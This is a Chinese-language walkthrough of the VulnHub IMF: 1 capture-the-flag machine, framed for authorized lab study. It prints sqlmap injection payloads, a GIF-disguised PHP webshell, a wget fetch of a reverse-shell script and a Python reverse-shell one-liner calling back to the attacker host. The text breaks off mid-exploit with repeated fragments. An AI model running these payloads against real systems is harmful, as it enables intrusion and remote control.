vulhub系列-47-IMF: 1(超详细)

免责声明本文记录的是 IMF: 1 渗透测试靶机 的解题过程所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规自觉维护网络空间安全。欢迎来到“IMF”我的第一台Boot2Root虚拟机。IMF是一个情报机构你必须黑进它才能获取所有旗帜并最终确认身份。旗帜开始时很简单但随着进展会变得越来越难。每个旗帜都包含指向下一个旗帜的提示。希望你喜欢这个虚拟平台也希望你能学到点东西。环境 https://download.vulnhub.com/imf/IMF.ova一、信息收集1、探测目标IP地址arp-scan -l #探测当前网段的所有ip地址┌──(root㉿kali)-[~] └─# arp-scan -l #探测当前网段的所有ip地址 Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.11 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:4b:b8:1e PCS Systemtechnik GmbH 192.168.5.14 08:00:27:09:9f:0e PCS Systemtechnik GmbH ​ 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.942 seconds (131.82 hosts/sec). 3 responded ​nmap -sP 192.168.5.0/24┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 01:07 -0500 Nmap scan report for 192.168.5.1 Host is up (0.00014s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00018s latency). MAC Address: 08:00:27:4B:B8:1E (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.14 Host is up (0.00018s latency). MAC Address: 08:00:27:09:9F:0E (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.11 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 3.00 seconds目标IP192.168.5.142、探测目标IP开放端口nmap -sV -p- 192.168.5.14┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.14 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 01:07 -0500 Nmap scan report for 192.168.5.14 Host is up (0.00017s latency). Not shown: 65534 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 08:00:27:09:9F:0E (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 110.91 seconds端口803、目录探测dirsearch -u http://192.168.5.14┌──(root?kali)-[~] └─# dirsearch -u http://192.168.5.14 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 Wordlist size: 11460 Output File: /root/reports/http_192.168.5.14/_26-02-22_01-11-30.txt Target: http://192.168.5.14/ [01:11:30] Starting: [01:11:31] 301 - 309B - /js - http://192.168.5.14/js/ [01:11:31] 403 - 298B - /.ht_wsr.txt [01:11:31] 403 - 301B - /.htaccess.orig [01:11:31] 403 - 301B - /.htaccess.bak1 [01:11:31] 403 - 303B - /.htaccess.sample [01:11:31] 403 - 301B - /.htaccess.save [01:11:31] 403 - 299B - /.htaccess_sc [01:11:31] 403 - 299B - /.htaccessBAK [01:11:31] 403 - 301B - /.htaccess_orig [01:11:31] 403 - 299B - /.htaccessOLD [01:11:31] 403 - 302B - /.htaccess_extra [01:11:31] 403 - 300B - /.htaccessOLD2 [01:11:31] 403 - 291B - /.htm [01:11:31] 403 - 292B - /.html [01:11:31] 403 - 298B - /.httr-oauth [01:11:31] 403 - 301B - /.htpasswd_test [01:11:31] 403 - 297B - /.htpasswds [01:11:32] 403 - 292B - /.php3 [01:11:32] 403 - 291B - /.php [01:11:44] 200 - 2KB - /contact.php [01:11:45] 301 - 310B - /css - http://192.168.5.14/css/ [01:11:48] 301 - 312B - /fonts - http://192.168.5.14/fonts/ [01:11:50] 301 - 313B - /images - http://192.168.5.14/images/ [01:11:50] 403 - 294B - /images/ [01:11:51] 403 - 290B - /js/ [01:11:59] 200 - 2KB - /projects.php [01:12:01] 403 - 301B - /server-status/ [01:12:01] 403 - 300B - /server-status Task Completed二、漏洞利用1、访问主页点第三个选项查看网页源码得到flag1{YWxsdGhlZmlsZXM}把flag里的内容base64解码得到字符串allthefiles点击首页第一个选项查看源码这三段有点像base64编码把三段拼起来ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ用base64解码得到flag2{aW1mYWRtaW5pc3RyYXRvcg}再把flag2里面的内容解码得到字符串imfadministrator访问一下imfadministrator路径是一个登陆界面。查看网页源码发现提示“我无法使用SQL所以我硬编码了密码。它仍然非常安全。随便输入用户名和密码点登录页面回显提示“无效的用户名”接下来就需要找到正确的用户名浏览网页发现有三个邮箱用这三个用户名登陆试试rmichaelsimf.local akeithimf.local estoneimf.local使用第一个用户名rmichaels登录时发现页面回显变成了“无效的密码”说明我们的用户名是正确的。但是我们没有密码使用完全暴力破解成功率极低。2、漏洞利用yakit抓包进行绕过php strcmp比较字符串绕过字符串和数组进行比较 ?php $flag flag{xxxxx}; if (isset($_GET[a])) { //如果 str1 小于 str2 返回 0 如果 str1大于 str2返回 0如果两者相等返回 0。 //比较两个字符串区分大小写 if (strcmp($_GET[a], $flag) 0) die(Flag: .$flag); else print No; } ?a的输入为非字符串类型数据就会报错自动return 0,我们可以将pass以数组的方式传输数据使其报错。userrmichaelspass[]111111得到flag3{Y29udGludWVUT2Ntcw}base64解密得到continueTOcms关闭抓包页面跳转到如下界面点击IMF CMS进入新的页面在url地址栏加单引号测试下发现有报错回显说明存在sql注入漏洞http://192.168.5.14/imfadministrator/cms.php?pagenamehome 这里因为是基于登录之后的sql注入使用sqlmap需要加上cookie值3、SQLmapa、数据库获取全部数据库sqlmap -o -u http://192.168.5.14/imfadministrator/cms.php?pagenamehome --cookiePHPSESSIDsioa5jkoam217baql59f577fg3 --batch -dbs┌──(root㉿kali)-[~] └─# sqlmap -o -u http://192.168.5.14/imfadministrator/cms.php?pagenamehome --cookiePHPSESSIDsioa5jkoam217baql59f577fg3 --batch -dbs ___ __H__ ___ ___[(]_____ ___ ___ {1.9.12#stable} |_ -| . [,] | .| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 02:30:03 /2026-02-22/ [02:30:03] [INFO] testing connection to the target URL [02:30:03] [INFO] checking if the target is protected by some kind of WAF/IPS [02:30:03] [INFO] testing NULL connection to the target URL [02:30:03] [INFO] NULL connection is supported with GET method (Range) [02:30:03] [INFO] testing if the target URL content is stable [02:30:04] [INFO] target URL content is stable [02:30:04] [INFO] testing if GET parameter pagename is dynamic [02:30:04] [INFO] GET parameter pagename appears to be dynamic [02:30:04] [INFO] heuristic (basic) test shows that GET parameter pagename might be injectable (possible DBMS: MySQL) [02:30:04] [INFO] testing for SQL injection on GET parameter pagename it looks like the back-end DBMS is MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y for the remaining tests, do you want to include all tests for MySQL extending provided level (1) and risk (1) values? [Y/n] Y [02:30:04] [INFO] testing AND boolean-based blind - WHERE or HAVING clause [02:30:04] [INFO] GET parameter pagename appears to be AND boolean-based blind - WHERE or HAVING clause injectable [02:30:04] [INFO] testing Generic inline queries [02:30:04] [INFO] testing MySQL 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) [02:30:04] [INFO] testing MySQL 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED) [02:30:04] [INFO] testing MySQL 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP) [02:30:04] [INFO] testing MySQL 5.5 OR error-based - WHERE or HAVING clause (EXP) [02:30:04] [INFO] testing MySQL 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) [02:30:04] [INFO] testing MySQL 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) [02:30:04] [INFO] testing MySQL 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS) [02:30:04] [INFO] testing MySQL 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS) [02:30:04] [INFO] testing MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) [02:30:04] [INFO] GET parameter pagename is MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) injectable [02:30:04] [INFO] testing MySQL inline queries [02:30:04] [INFO] testing MySQL 5.0.12 stacked queries (comment) [02:30:04] [WARNING] time-based comparison requires larger statistical model, please wait................. (done) [02:30:04] [INFO] testing MySQL 5.0.12 stacked queries [02:30:04] [INFO] testing MySQL 5.0.12 stacked queries (query SLEEP - comment) [02:30:04] [INFO] testing MySQL 5.0.12 stacked queries (query SLEEP) [02:30:04] [INFO] testing MySQL 5.0.12 stacked queries (BENCHMARK - comment) [02:30:04] [INFO] testing MySQL 5.0.12 stacked queries (BENCHMARK) [02:30:04] [INFO] testing MySQL 5.0.12 AND time-based blind (query SLEEP) [02:30:14] [INFO] GET parameter pagename appears to be MySQL 5.0.12 AND time-based blind (query SLEEP) injectable [02:30:14] [INFO] testing Generic UNION query (NULL) - 1 to 20 columns [02:30:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [02:30:14] [INFO] testing MySQL UNION query (NULL) - 1 to 20 columns [02:30:14] [INFO] ORDER BY technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [02:30:14] [INFO] target URL appears to have 1 column in query [02:30:14] [INFO] GET parameter pagename is MySQL UNION query (NULL) - 1 to 20 columns injectable GET parameter pagename is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests: --- Parameter: pagename (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pagenamehome AND 18391839 AND NRKENRKE Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pagenamehome AND (SELECT 3238 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(32383238,1))),0x7170627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND RziMRziM Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: pagenamehome AND (SELECT 9500 FROM (SELECT(SLEEP(5)))dmpx) AND hajyhajy Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: pagename-1830 UNION ALL SELECT CONCAT(0x7162707171,0x6b6247757863596967454e4a694b476a4147735654546f41616c624e4678444a586e43716d674b76,0x7170627071)# --- [02:30:14] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.04 or 16.10 (xenial or yakkety) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5.0 [02:30:14] [INFO] fetching database names [02:30:14] [INFO] starting 3 threads [02:30:14] [INFO] retrieved: admin [02:30:14] [INFO] retrieved: mysql [02:30:14] [INFO] retrieved: information_schema [02:30:14] [INFO] retrieved: performance_schema [02:30:14] [INFO] retrieved: sys available databases [5]: [*] admin [*] information_schema [*] mysql [*] performance_schema [*] sys [02:30:14] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 02:30:14 /2026-02-22/结果 available databases [5]: [*] admin [*] information_schema [*] mysql [*] performance_schema [*] sysb、数据表获取admin数据库的表名发现里面只有一个pages表sqlmap -o -u http://192.168.5.14/imfadministrator/cms.php?pagenamehome --cookiePHPSESSIDsioa5jkoam217baql59f577fg3 --batch -D admin -tables┌──(root㉿kali)-[~] └─# sqlmap -o -u http://192.168.5.14/imfadministrator/cms.php?pagenamehome --cookiePHPSESSIDsioa5jkoam217baql59f577fg3 --batch -D admin -tables ___ __H__ ___ ___[.]_____ ___ ___ {1.9.12#stable} |_ -| . [] | .| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 02:31:07 /2026-02-22/ [02:31:08] [INFO] resuming back-end DBMS mysql [02:31:08] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: pagename (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pagenamehome AND 18391839 AND NRKENRKE Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pagenamehome AND (SELECT 3238 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(32383238,1))),0x7170627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND RziMRziM Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: pagenamehome AND (SELECT 9500 FROM (SELECT(SLEEP(5)))dmpx) AND hajyhajy Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: pagename-1830 UNION ALL SELECT CONCAT(0x7162707171,0x6b6247757863596967454e4a694b476a4147735654546f41616c624e4678444a586e43716d674b76,0x7170627071)# --- [02:31:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (yakkety or xenial) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5.0 [02:31:08] [INFO] fetching tables for database: admin Database: admin [1 table] ------- | pages | ------- [02:31:08] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 02:31:08 /2026-02-22/结果 Database: admin [1 table] ------- | pages | -------c、字段获取pages表里面的全部内容sqlmap -o -u http://192.168.5.14/imfadministrator/cms.php?pagenamehome --cookiePHPSESSIDsioa5jkoam217baql59f577fg3 --batch -D admin -T pages --dump┌──(root㉿kali)-[~] └─# sqlmap -o -u http://192.168.5.14/imfadministrator/cms.php?pagenamehome --cookiePHPSESSIDsioa5jkoam217baql59f577fg3 --batch -D admin -T pages --dump ___ __H__ ___ ___[]_____ ___ ___ {1.9.12#stable} |_ -| . [)] | .| . | |___|_ []_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting 02:32:18 /2026-02-22/ [02:32:18] [INFO] resuming back-end DBMS mysql [02:32:18] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: pagename (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pagenamehome AND 18391839 AND NRKENRKE Type: error-based Title: MySQL 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: pagenamehome AND (SELECT 3238 FROM(SELECT COUNT(*),CONCAT(0x7162707171,(SELECT (ELT(32383238,1))),0x7170627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND RziMRziM Type: time-based blind Title: MySQL 5.0.12 AND time-based blind (query SLEEP) Payload: pagenamehome AND (SELECT 9500 FROM (SELECT(SLEEP(5)))dmpx) AND hajyhajy Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: pagename-1830 UNION ALL SELECT CONCAT(0x7162707171,0x6b6247757863596967454e4a694b476a4147735654546f41616c624e4678444a586e43716d674b76,0x7170627071)# --- [02:32:18] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 16.10 or 16.04 (xenial or yakkety) web application technology: Apache 2.4.18 back-end DBMS: MySQL 5.0 [02:32:18] [INFO] fetching columns for table pages in database admin [02:32:18] [INFO] starting 3 threads [02:32:18] [INFO] retrieved: id,int(11) [02:32:18] [INFO] retrieved: pagename,varchar(255) [02:32:18] [INFO] retrieved: pagedata,text [02:32:18] [INFO] fetching entries for table pages in database admin [02:32:18] [INFO] starting 3 threads [02:32:18] [INFO] retrieved: 2,Welcome to the IMF Administration.,h... [02:32:18] [INFO] retrieved: 3,Training classrooms available. br /... [02:32:18] [INFO] retrieved: 1,Under Construction.,upload [02:32:18] [INFO] retrieved: 4,h1Disavowed List/h1img src./ima... Database: admin Table: pages [4 entries] ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | id | pagedata | pagename | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 1 | Under Construction. | upload | | 2 | Welcome to the IMF Administration. | home | | 3 | Training classrooms available. br /img src./images/whiteboard.jpgbr / Contact us for training. | tutorials-incomplete | | 4 | h1Disavowed List/h1img src./images/redacted.jpgbr /ulli*********/lili****** ******/lili*******/lili**** ********/li/ulbr /-Secretary | disavowlist | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [02:32:18] [INFO] table admin.pages dumped to CSV file /root/.local/share/sqlmap/output/192.168.5.14/dump/admin/pages.csv [02:32:18] [INFO] fetched data logged to text files under /root/.local/share/sqlmap/output/192.168.5.14 [*] ending 02:32:18 /2026-02-22/访问一下上面这两个图片路径有一个二维码。http://192.168.5.14/imfadministrator/images/whiteboard.jpg http://192.168.5.14/imfadministrator/images/redacted.jpg用手机扫描第一张二维码发现flag4{dXBsb2Fkcjk0Mi5waHA}base64解码得到uploadr942.php。访问一下这个php页面发现是一个文件上传的页面GIF89a ?php $a$_GET[a]; print($a); ?上传a.gif文件上传成功后查看一下网页源码发现上传的文件名被改了。http://192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?als查看flag5内容192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?acat flag5_abc123def.txt得到flag5{YWdlbnRzZXJ2aWNlcw} 解码得agentservices4、反弹shellcp /usr/share/webshells/php/php-reverse-shell.php . vim php-reverse-shell.php 修改下面两个参数 $ip 192.168.5.11; // kali的IP $port 1234; // nc监听端口 mv php-reverse-shell.php reverse.php python -m http.server 80浏览器192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?als 192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?awget http://192.168.5.11/reverse.php 192.168.5.14/imfadministrator/uploads/041e919fa8cf.gif?als上传成功后kali监听浏览器访问url192.168.5.14/imfadministrator/uploads/reverse.phpkali: nc -lvnp 1234成功┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.5.11] from (UNKNOWN) [192.168.5.14] 33230 Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 03:00:43 up 1:07, 0 users, load average: 0.06, 0.03, 0.00 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid33(www-data) gid33(www-data) groups33(www-data) /bin/sh: 0: cant access tty; job control turned off $三、权限提升1、切换bashpython3 -c import pty; pty.spawn(/bin/bash)┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.5.11] from (UNKNOWN) [192.168.5.14] 33230 Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux 03:00:43 up 1:07, 0 users, load average: 0.06, 0.03, 0.00 USER TTY FROM LOGIN IDLE JCPU PCPU WHAT uid33(www-data) gid33(www-data) groups33(www-data) /bin/sh: 0: cant access tty; job control turned off $ python3 -c import pty; pty.spawn(/bin/bash) www-dataimf:/$2、查找agent的服务提示查找www-dataimf:/$ whereis agent whereis agent agent: /usr/local/bin/agent www-dataimf:/$Shell中输入得到结果agent: /usr/local/bin/agent进入/usr/local/bin/ 目录发现还有一个叫access_codes的文件打开后显示SYN 7482,8279,9467www-dataimf:/$ cd /usr/local/bin/ cd /usr/local/bin/ www-dataimf:/usr/local/bin$ ls ls access_codes agent www-dataimf:/usr/local/bin$ cat access_codes cat access_codes SYN 7482,8279,9467 www-dataimf:/usr/local/bin$3、端口敲门knock 192.168.5.14 7482 8279 9467 -v nmap -p7788 192.168.5.14┌──(root㉿kali)-[~] └─# knock 192.168.5.14 7482 8279 9467 -v hitting tcp 192.168.5.14:7482 hitting tcp 192.168.5.14:8279 hitting tcp 192.168.5.14:9467 ┌──(root㉿kali)-[~] └─# nmap -p7788 192.168.5.14 Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-22 03:05 -0500 Nmap scan report for 192.168.5.14 Host is up (0.00027s latency). PORT STATE SERVICE 7788/tcp open unknown MAC Address: 08:00:27:09:9F:0E (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds7788端口被敲开然后在kali本地利用nc去连接nc 192.168.5.14 7788┌──(root㉿kali)-[~] └─# nc 192.168.5.14 7788 ___ __ __ ___ |_ _| \/ | __| Agent | || |\/| | _| Reporting |___|_| |_|_| System Agent ID :在shell中查看是否安装python发现安装了python3查看是否安装perl利用perl反弹一个shellwhich python3 python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.5.11,2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);www-dataimf:/usr/local/bin$ which python3 which python3 /usr/bin/python3 www-dataimf:/usr/local/bin$ www-dataimf:/usr/local/bin$ python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.5.11,2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]); (s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/sh,-i]);flag1{YWxsdGhlZmlsZXM} ​ flag2{aW1mYWRtaW5pc3RyYXRvcg} ​ flag3{Y29udGludWVUT2Ntcw} ​ flag4{dXBsb2Fkcjk0Mi5waHA}本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路始于合规终于责任。